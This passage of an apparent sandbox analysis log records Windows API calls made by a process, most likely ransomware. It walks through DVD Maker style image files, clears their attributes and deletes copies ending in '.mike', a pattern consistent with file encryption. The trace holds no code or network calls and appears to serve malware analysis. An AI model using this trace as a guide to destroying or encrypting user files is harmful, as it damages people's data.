lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.862] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.866] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0055.867] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\1047x576black.png.mike")) returned 1 [0055.868] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.872] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png", dwFileAttributes=0x80) returned 0 [0055.872] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png.mike")) returned 1 [0055.873] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.880] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png", dwFileAttributes=0x80) returned 0 [0055.881] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\blackbars60.png.mike")) returned 1 [0055.882] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.888] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png", dwFileAttributes=0x80) returned 0 [0055.888] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\layers.png.mike")) returned 1 [0055.890] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.894] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0055.894] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_buttongraphic.png.mike")) returned 1 [0055.896] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.899] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0055.900] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_selectionsubpicture.png.mike")) returned 1 [0055.906] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.910] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0055.910] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_buttongraphic.png.mike")) returned 1 [0055.912] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.916] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0055.916] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_selectionsubpicture.png.mike")) returned 1 [0055.918] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.922] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0055.922] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_buttongraphic.png.mike")) returned 1 [0055.924] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.928] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0055.928] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationup_selectionsubpicture.png.mike")) returned 1 [0055.929] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0055.929] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.929] CoTaskMemFree (pv=0x4e1c10) [0055.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.937] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.944] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png", dwFileAttributes=0x80) returned 0 [0055.944] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-background.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-background.png.mike")) returned 1 [0055.945] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.949] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png", dwFileAttributes=0x80) returned 0 [0055.949] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-highlight.png.mike")) returned 1 [0055.951] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.956] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png", dwFileAttributes=0x80) returned 0 [0055.957] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-image-mask.png.mike")) returned 1 [0055.958] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.964] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png", dwFileAttributes=0x80) returned 0 [0055.964] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-overlay.png.mike")) returned 1 [0055.966] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.984] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png", dwFileAttributes=0x80) returned 0 [0055.984] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\background.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\background.png.mike")) returned 1 [0055.986] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.990] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png", dwFileAttributes=0x80) returned 0 [0055.990] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-back-static.png.mike")) returned 1 [0055.992] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.996] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png", dwFileAttributes=0x80) returned 0 [0055.996] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-next-static.png.mike")) returned 1 [0055.999] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.004] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png", dwFileAttributes=0x80) returned 0 [0056.005] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-previous-static.png.mike")) returned 1 [0056.006] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.009] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png", dwFileAttributes=0x80) returned 0 [0056.010] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-highlight.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-highlight.png.mike")) returned 1 [0056.011] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.017] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png", dwFileAttributes=0x80) returned 0 [0056.017] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\button-overlay.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\button-overlay.png.mike")) returned 1 [0056.018] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.022] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png", dwFileAttributes=0x80) returned 0 [0056.022] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Memories_buttonClear.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\memories_buttonclear.png.mike")) returned 1 [0056.023] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.028] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png", dwFileAttributes=0x80) returned 0 [0056.028] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_btn-back-static.png.mike")) returned 1 [0056.030] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.039] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png", dwFileAttributes=0x80) returned 0 [0056.040] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_content-background.png.mike")) returned 1 [0056.041] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.047] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png", dwFileAttributes=0x80) returned 0 [0056.047] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\scrapbook.png.mike")) returned 1 [0056.049] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.073] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png", dwFileAttributes=0x80) returned 0 [0056.073] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_content-background.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_content-background.png.mike")) returned 1 [0056.075] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.079] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png", dwFileAttributes=0x80) returned 0 [0056.079] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_mainimage-mask.png.mike")) returned 1 [0056.081] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.084] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png", dwFileAttributes=0x80) returned 0 [0056.085] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_select-highlight.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_select-highlight.png.mike")) returned 1 [0056.086] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0056.086] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0056.086] CoTaskMemFree (pv=0x4e1c10) [0056.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0056.092] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.097] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0056.097] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\1047x576black.png.mike")) returned 1 [0056.099] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.102] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png", dwFileAttributes=0x80) returned 0 [0056.103] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\15x15dot.png.mike")) returned 1 [0056.346] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.350] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png", dwFileAttributes=0x80) returned 0 [0056.350] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\decorative_rule.png.mike")) returned 1 [0056.351] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.355] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0056.355] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_buttongraphic.png.mike")) returned 1 [0056.356] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.360] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0056.360] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationleft_selectionsubpicture.png.mike")) returned 1 [0056.361] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.365] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0056.365] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_buttongraphic.png.mike")) returned 1 [0056.367] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.370] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0056.371] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationRight_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationright_selectionsubpicture.png.mike")) returned 1 [0056.372] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.377] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0056.377] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_buttongraphic.png.mike")) returned 1 [0056.378] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0056.382] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0056.382] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\NavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\navigationup_selectionsubpicture.png.mike")) returned 1 [0056.383] GetDiskFreeSpaceExW (in: 